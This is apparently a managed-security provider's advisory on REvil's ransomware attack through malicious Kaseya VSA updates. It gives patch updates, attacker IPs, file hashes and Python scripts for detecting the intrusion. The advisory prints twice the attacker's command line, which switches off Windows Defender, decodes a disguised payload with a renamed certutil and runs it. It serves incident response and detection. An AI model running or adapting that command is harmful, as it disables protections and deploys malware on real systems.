REvil Ransomware Executes Supply Chain Attack via Malicious Kaseya Update v2
Posted Date: 07/12/2021
Published Date: 07/12/2021
Sector: Information Technology & Information Security
DATE(S) ISSUED: 07/02/2021
SUBJECT: Supply Chain Attack – Malicious Kaseya Update Executing Malware by REvil Group
UPDATED OVERVIEW – 07/12/2021:
Kaseya has now successfully developed a patch for VSA servers on Sunday 07/11/2021. Below are the latest communications from Kaseya. These communications can also be found using the link in the references below.
You can install the patch with the "KInstall.exe" update utility, found online here if you do not find a local copy. The installer also suggests running Windows Update if you have not recently installed the latest updates from Microsoft.
From our testing, installing the patch took approximately 10 minutes. After logging back in to the VSA service, you are prompted to change your password to meet the new policy requirements. With this patch installed, we believe the attack vector is no longer present.
Also note as previously communicated, spammers are using the news about the Kaseya Incident to send out fake email notifications that appear to be Kaseya updates. These are phishing emails that may contain malicious links and/or attachments.
Do not click on any links or download any attachments in emails claiming to be a Kaseya advisory. Moving forward, all new Kaseya email updates will not contain any links or attachments.
VSA Update – 07/12/2021 8:00 AM EST:
As posted in the previous update we released the patch to VSA On-Premises customers and began deploying to our VSA SaaS Infrastructure prior to the 4:00 PM target. The restoration of services is now complete, with 100% of our SaaS customers live as of 3:30 AM US EDT. Our support teams continue to work with VSA On-Premises customers who have requested assistance with the patch. We will continue to post updates as new information becomes available.
VSA Update – 07/11/2021 4:30 EST:
VSA SaaS and On-Premises Release Notes have now been published and are available at: https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041
The restoration of our VSA SaaS Infrastructure has begun. We will send email notifications as the individual instances come back online over the next several hours.
VSA SaaS Startup Runbook – https://helpdesk.kaseya.com/hc/en-gb/articles/4403709476369
VSA SaaS Hardening and Best Practice Guide – https://helpdesk.kaseya.com/hc/en-gb/articles/4403622421009-VSA-SaaS-Best-Practices
The VSA On-Premises patch is now available. You can run KINSTALL as you normally do as part of your patching process.
On Premises Startup Runbook (Updated July 11th – Updated Step 4) – https://helpdesk.kaseya.com/hc/en-gb/articles/4403709150993incident-response
VSA On-Premise Hardening and Practice Guide – https://helpdesk.kaseya.com/hc/en-gb/articles/4403760102417
Status updates from Kaseya can be found using the link as follows: https://www.kaseya.com/potential-attack-on-kaseya-vsa/?mkt_tok=OTM0LVhRQi01NjgAAAF-HMaXjyYKZpB4GMeVb1FvPQDEnE70x5s52h7OuAe962wcTuGkhfkUiJ-WlChAElUhRJKtHpfaFOyL4UyqIYOuNGXR5Qed0pzuVeLikGEHBvtI4LVb
“The REvil ransomware gang appears to have gained access to the infrastructure of Kaseya, a provider of remote management solutions, and is using a malicious update for the VSA software to deploy ransomware to companies across the world.
The incident first came to light earlier today in a Reddit section dedicated to managed service providers (MSPs), companies that provide remote IT services to smaller businesses lacking an IT department and which are usually Kaseya’s primary customers.
MSPs use Kaseya’s VSA platform to manage and deploy software updates to customer networks or access remote systems to troubleshoot a customer’s IT problems; however, this very same functionality can be abused by threat actors who manage to gain access to an MSP’s VSA platform.
UPDATED THREAT INTELLIGENCE - 07/07/2021:
All on-premises VSA servers should remain offline until Kaseya issues further instructions on when it is safe to restore operations. A patch will need to be installed before the VSA is restarted, along with a set of recommendations on how to increase your security posture.
On Monday, July 5, Kaseya announced they are developing a new patch for on-premise installations to help customers get back into service. Kaseya also published a Compromise Detection Tool for customers to check whether their on-premise installation had actually been compromised.
Since this outbreak, attackers have been scanning for internet-exposed Kaseya on-premise servers using publicly available platforms such as Shodan.io. This time window allows attack groups besides REvil to obtain immediate access over the internet to sensitive customer networks.
At this point, this appears to be the largest mass-scale ransomware incident to date. In an unexpected twist, the attackers are offering a universal decryption tool for all victims at a lump sum of $50 million (originally $70 million).
“We are tracking 8 MSPs where this has happened and working in close collaboration with two of them. Although all four are running Kaseya VSA, we have not validated that VSA is being exploited (not fair at this time to say, "Kaseya has been hacked" without evidence).”
Kaseya's official recommendation is to: "IMMEDIATELY shutdown your local VSA server until you receive further notice from us.
We are experiencing a potential attack against the VSA that has been limited to a small number of on-premise customers only as of 2:00 PM EDT today. We are in the process of investigating the root cause of the incident with an abundance of caution, but we recommend that you IMMEDIATELY shutdown your VSA server until you receive further notice from us. It’s critical that you do this immediately, because one of the first things the attacker does is shut off administrative access to the VSA.”
SYSTEMS AFFECTED: Kaseya VSA Servers - Windows
Managed Service Providers (MSPs), and other companies that provide remote IT services or remote system access to other companies, are affected by this threat. Kaseya VSA is also used directly by medium and large businesses, so this attack is not limited to MSPs but affects non-MSP entities as well.
UPDATED TECHNICAL SUMMARY - 07/07/2021:
On July 2, around 10:30 ET, many Kaseya VSA servers were exploited and used to deploy ransomware. The details of the server-side intrusion are as follows:
Attackers uploaded agent.crt and Screenshot.jpg to exploited VSA servers and this activity can be found in KUpload.log (which *may* be wiped by the attackers or encrypted by ransomware if a VSA agent was also installed on the VSA server).
A series of GET and POST requests using curl can be found within the KaseyaEdgeServices logs located in the %ProgramData%\Kaseya\Log\KaseyaEdgeServices directory, with file names following this modified ISO 8601 naming scheme: KaseyaEdgeServices-YYYY-MM-DDTHH-MM-SSZ.log.
Attackers came from the following IP addresses using the user agent curl/7.69.1:
• 18.223.199[.]234 (Amazon Web Services) – discovered by Huntress
• 161.35.239[.]148 (Digital Ocean) – discovered by TrueSec
• 35.226.94[.]113 (Google Cloud) – discovered by Kaseya
• 162.253.124[.]162 (Sapioterra) – discovered by Kaseya
We've been in contact with the internal hunt teams at AWS and Digital Ocean and have passed information to the FBI Dallas office and relevant intelligence community agencies.
The VSA procedure used to deploy the encryptor was named "Kaseya VSA Agent Hot-fix". An additional procedure named "Archive and Purge Logs" was run afterwards to clean up the attackers' traces.
The "Kaseya VSA Agent Hot-fix" procedure ran the following: "C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
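The server-side indicators above (the four attacker source IPs, the curl/7.69.1 user agent, and the agent.crt / Screenshot.jpg uploads recorded in KUpload.log) can be swept across logs copied off a VSA server that is being kept offline. The Python script below is an added example written for this advisory, not Kaseya or CyFlare tooling. Because the exact KaseyaEdgeServices and KUpload.log line formats are not reproduced in the advisory, the sample lines are constructed, and the matchers look for the indicator strings anywhere in a line rather than parsing fixed fields, so the same functions apply unchanged to the real files.

```python
"""Sweep collected Kaseya VSA server logs for the server-side indicators in
this advisory.  Added example, not Kaseya or CyFlare code.  The real
KaseyaEdgeServices / KUpload.log line formats are not reproduced here, so
the sample lines are constructed and the matchers search for the indicator
strings anywhere in a line instead of parsing fixed fields."""
import re
from collections import Counter

# Attacker source IPs from the advisory (defanging brackets removed so they
# match what a real log line contains), with the attribution given there.
ATTACKER_IPS = {
    "18.223.199.234": "Amazon Web Services (Huntress)",
    "161.35.239.148": "Digital Ocean (TrueSec)",
    "35.226.94.113": "Google Cloud (Kaseya)",
    "162.253.124.162": "Sapioterra (Kaseya)",
}
ATTACKER_UA = "curl/7.69.1"
UPLOADED_FILES = ("agent.crt", "Screenshot.jpg")

# Whole-token match so e.g. 18.223.199.23 is not reported as 18.223.199.234.
_IP_RE = re.compile(
    r"(?<![\d.])(" + "|".join(map(re.escape, ATTACKER_IPS)) + r")(?![\d.])")
_UPLOAD_RE = re.compile("|".join(map(re.escape, UPLOADED_FILES)), re.IGNORECASE)


def scan_edge_log(lines):
    """Findings for lines containing an attacker IP and/or the curl UA.
    Each finding is (line_no, [ips], ua_seen, line)."""
    findings = []
    for n, line in enumerate(lines, 1):
        ips = sorted(set(_IP_RE.findall(line)))
        ua_seen = ATTACKER_UA in line
        if ips or ua_seen:
            findings.append((n, ips, ua_seen, line.rstrip()))
    return findings


def scan_kupload_log(lines):
    """(line_no, matched_name, line) for lines mentioning the uploaded files."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = _UPLOAD_RE.search(line)
        if m:
            findings.append((n, m.group(0), line.rstrip()))
    return findings


def hits_per_ip(edge_findings):
    """Count how many flagged lines each attacker IP appears on."""
    counts = Counter()
    for _, ips, _, _ in edge_findings:
        counts.update(ips)
    return dict(counts)


# Constructed sample lines (not real Kaseya log output); request paths are
# placeholders.
SAMPLE_EDGE_LOG = [
    '2021-07-02T14:31:07Z 10.0.0.5 GET /path/a ua="Mozilla/5.0" 200',
    '2021-07-02T14:32:11Z 18.223.199.234 GET /path/b ua="curl/7.69.1" 200',
    '2021-07-02T14:32:12Z 18.223.199.234 POST /path/c ua="curl/7.69.1" 200',
    '2021-07-02T14:32:40Z 35.226.94.113 POST /path/d ua="curl/7.69.1" 200',
    '2021-07-02T14:33:02Z 18.223.199.23 GET /path/a ua="curl/7.64.0" 200',
]
SAMPLE_KUPLOAD_LOG = [
    "2021-07-02 14:32:12 Uploaded file agent.crt",
    "2021-07-02 14:32:13 Uploaded file Screenshot.jpg",
    "2021-07-02 14:40:00 Uploaded file report.pdf",
]

if __name__ == "__main__":
    for finding in scan_edge_log(SAMPLE_EDGE_LOG):
        print("EDGE  ", finding)
    for finding in scan_kupload_log(SAMPLE_KUPLOAD_LOG):
        print("UPLOAD", finding)
    print(hits_per_ip(scan_edge_log(SAMPLE_EDGE_LOG)))
```

On a real case, read each KaseyaEdgeServices-*.log with open(...).readlines() and pass the list to scan_edge_log; a hit on the user agent alone is worth triaging even if the source IP is not one of the four listed, since the advisory's list is what was known at the time.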
Endpoint Indicators of Compromise
Ransomware encryptors pushed via the Kaseya VSA agent were dropped in TempPath with the file name agent.crt and decoded to agent.exe. TempPath resolves to c:\kworking\agent.exe by default and is configurable within HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Kaseya\Agent\.
When agent.exe runs, the legitimate Windows Defender executable MsMpEng.exe and the encryptor payload mpsvc.dll are dropped into the hardcoded path "c:\Windows" to perform DLL sideloading.
The mpsvc.dll Sodinokibi DLL creates the registry key HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\BlackLivesMatter, which contains several registry values that store encryptor runtime keys and configuration artifacts.
• agent.crt - MD5: 939aae3cc456de8964cb182c75a5f8cc - Encoded malicious content
• agent.exe - MD5: 561cffbaba71a6e8cc1cdceda990ead4 - Decoded contents of agent.crt
• cert.exe - MD5: - Legitimate Windows certutil.exe utility
• mpsvc.dll - MD5: a47cf00aedf769d60d58bfe00c0b5421 - REvil encryptor payload
MITRE ATT&CK TTPs Used in Kaseya Attack
• T1112 – Modify Registry
• T1012 – Query Registry
• T1082 – System Information Discovery
• T1120 – Peripheral Device Discovery
• T1491 – Defacement
• T1543.003 – Create or Modify System Process: Windows Service
• T1036 – Masquerading
• T1036.003 – Masquerading: Rename System Utilities
• T1202 – Indirect Command Execution
• T1486 – Data Encrypted for Impact
• T1106 – Native API
Here are the validated indicators of compromise known at this time:
• Ransomware encryptor is dropped to c:\kworking\agent.exe
• The VSA procedure is named "Kaseya VSA Agent Hot-fix"
• At least two tasks run the following command (the same command line shown in the technical summary above):
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
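The command line above is the most durable endpoint indicator in this advisory: its Set-MpPreference tampering, the copy of certutil.exe to cert.exe, the -decode of agent.crt and the launch of agent.exe from the kworking path can each be written as a rule over process-creation command lines (Sysmon Event ID 1, EDR telemetry or a forensic image), and the MD5s from the endpoint IOC list above can be checked against files in the agent TempPath. The Python below is an added example written for this advisory, not Kaseya or CyFlare code; the rule names, the three-rule threshold, the helper names and the sample events are my own constructions, and only the command line and hashes come from the advisory.

```python
"""Endpoint checks for the indicators in this advisory.  Added example, not
Kaseya or CyFlare code: rule names, thresholds and sample events are mine.
Part 1 matches process command lines against the "Kaseya VSA Agent Hot-fix"
procedure's pattern; part 2 checks file bytes against the MD5 IOCs."""
import hashlib
import os
import re

# The procedure command line quoted in the advisory, used as a positive
# control for the rules below.
PROCEDURE_CMD = (
    r'"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
    r'-DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true '
    r'-DisableIOAVProtection $true -DisableScriptScanning $true '
    r'-EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode '
    r'-Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & '
    r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
    r'echo %RANDOM% >> C:\Windows\cert.exe & '
    r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
    r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe'
)

# Each rule is (name, compiled regex applied to the full command line).
COMMAND_LINE_RULES = [
    # Defender protections switched off via Set-MpPreference
    ("defender-tamper", re.compile(
        r"Set-MpPreference\b.*-Disable(RealtimeMonitoring|IntrusionPreventionSystem"
        r"|IOAVProtection|ScriptScanning)\s+\$true", re.I)),
    # certutil.exe copied to a renamed cert.exe (masquerading)
    ("certutil-renamed-copy", re.compile(
        r"copy\s+/Y\s+\S*certutil\.exe\s+\S*cert\.exe", re.I)),
    # cert.exe / certutil.exe decoding agent.crt into agent.exe
    ("certutil-decode-agent", re.compile(
        r"cert(?:util)?\.exe\s+-decode\s+\S*agent\.crt\s+\S*agent\.exe", re.I)),
    # agent.exe executed from the default Kaseya agent TempPath
    ("kworking-agent-exec", re.compile(r"\\kworking\\agent\.exe", re.I)),
]

def match_command_line(cmdline):
    """Names of every rule the command line matches."""
    return [name for name, rx in COMMAND_LINE_RULES if rx.search(cmdline)]

def hosts_hitting(events, min_rules=3):
    """events: iterable of {'host': ..., 'cmdline': ...} records.  Returns the
    hosts on which one command line matched at least min_rules rules.  A
    single rule (e.g. an admin running Set-MpPreference) is only a lead;
    three or more in the same command line is the procedure itself."""
    flagged = set()
    for ev in events:
        if len(match_command_line(ev["cmdline"])) >= min_rules:
            flagged.add(ev["host"])
    return flagged

# MD5s from the advisory's endpoint IOC list.
KNOWN_MD5 = {
    "939aae3cc456de8964cb182c75a5f8cc": "agent.crt (encoded malicious content)",
    "561cffbaba71a6e8cc1cdceda990ead4": "agent.exe (decoded contents of agent.crt)",
    "a47cf00aedf769d60d58bfe00c0b5421": "mpsvc.dll (REvil encryptor payload)",
}
IOC_NAMES = ("agent.crt", "agent.exe", "mpsvc.dll")
DEFAULT_TEMP_PATH = r"c:\kworking"  # configurable under the Kaseya\Agent key

def classify_bytes(name, data, known=KNOWN_MD5):
    """Description if the bytes hash to a known IOC; a weaker name-only note
    if just the filename matches (a rebuilt payload carries a new hash);
    otherwise None."""
    digest = hashlib.md5(data).hexdigest()
    if digest in known:
        return "hash match: " + known[digest]
    if name.lower() in IOC_NAMES:
        return "name match only (md5 %s not in IOC list)" % digest
    return None

def sweep_directory(path=DEFAULT_TEMP_PATH):
    """{full_path: description} for every flagged file directly under path."""
    hits = {}
    if not os.path.isdir(path):
        return hits
    for name in os.listdir(path):
        full = os.path.join(path, name)
        if os.path.isfile(full):
            with open(full, "rb") as f:
                verdict = classify_bytes(name, f.read())
            if verdict:
                hits[full] = verdict
    return hits

# Constructed process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "cmdline": PROCEDURE_CMD},
    {"host": "ws02", "cmdline": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "ws03", "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
]

if __name__ == "__main__":
    print(match_command_line(PROCEDURE_CMD))
    print(hosts_hitting(SAMPLE_EVENTS))
    print(sweep_directory())
```

The rules deliberately key on the structure of the command (renamed certutil, -decode of agent.crt, execution from kworking) rather than on the 4979-second ping or the exact hash, so they keep matching if the payload or the delay changes; run sweep_directory against both the configured TempPath and c:\Windows, since mpsvc.dll is dropped into the latter.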
Other possible Indicators of Compromise (IOCs) identified (file-type identification of the sample, with the reported confidence percentages):
• Rich PE header hash
• PE32 executable for MS Windows (GUI) Intel 80386 32-bit
• Windows Control Panel Item (generic) (88.3%)
• Win64 Executable (generic) (4.7%)
• Win16 NE executable (generic) (2.2%)
• Win32 Executable (generic) (2%)
• OS/2 Executable (generic) (0.9%)
• File size: 890.88 KB (912264 bytes)
UPDATED ACTIONS TAKEN - 07/12/2021:
The CyFlare SOC is still actively monitoring for indicators of compromise related to the Kaseya supply chain attack. The updated actions taken are as follows:
• Worked with our security tool vendors such as Stellar Cyber-BDS, SentinelOne, Sophos, and Tenable to have the IOCs identified from the attack productized into new security detections.
o The detection for this activity “Emerging Threat Detection” is now active for BDS. If it’s triggered in your environment, then the SOC will immediately escalate.
o Confirmed there are AlienVault OTX Pulses for detecting this activity and triggering security detections if observed. Reference Link: https://otx.alienvault.com/pulse/60e02f9e498dfdf25caf7753
o SentinelOne has also confirmed that this threat is detected and mitigated by SentinelOne. Reference Link: https://www.sentinelone.com/blog/revils-grand-coup-abusing-kaseya-managed-services-software-for-massive-profits/
o Sophos has published a query to check for matching IOCs present on endpoints. Reference Link: https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/
o Tenable has released a local Windows detection for Kaseya agents as well as a remote detection plugin for Kaseya VSA to help you identify potentially vulnerable systems. When patches are available, we will also provide a version check plugin.
• We have been continuously searching for any suspicious artifacts observed within affected customers’ environments since this threat emerged.
• As of today, July 12th, using the updated artifacts we can confirm that we still have not observed any indicators of compromise related to this emerging threat among any of our clients.
• Please continue to ensure local VSA servers are shut off until further notice from Kaseya. SaaS offerings of VSA are all still shut down by Kaseya (no SaaS VSA services online) until further notice and a patch is developed.
The CyFlare SOC is closely monitoring the situation as updates continue to arise from Kaseya and the public. We also have word from one of our affected customers that Kaseya, as a precaution, shut down the entire SaaS architecture so they can examine everyone’s instances to be sure this is isolated to on-prem folks.
At this time, we do not believe that any of our customers utilizing Kaseya are compromised. This conclusion is the result of threat hunting searches for the indicators of compromise listed above across each affected customer’s environment and the security solutions CyFlare manages.
For our managed endpoint or SentinelOne MDR customers, we have also implemented a global blacklist on one key IOC identified. We added the SHA1 Hash identified as the Kaseya VSA Ransomware Encryptor Hash to the blacklist.
As more details on this emerging threat arise through the cyber community or through Kaseya notices, your SOC will continue to address them. If there are any further updates, or any indication that one of our affected customers is compromised, we will engage you immediately.
If you have any further questions, comments, or concerns regarding this threat, please do not hesitate to contact your SOC at CyFlare. The SOC can be reached via email, ticket, or phone call to our support center.
Thank you for your cooperation.